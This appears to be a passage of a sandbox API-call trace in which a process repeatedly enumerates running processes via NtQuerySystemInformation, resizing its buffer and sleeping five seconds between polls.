[0159.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.201] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.239] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.250] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.265] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.282] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.295] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.313] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.327] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.343] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.359] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.374] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.399] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.404] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.421] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.436] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.452] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.467] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.484] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.499] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.513] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.527] 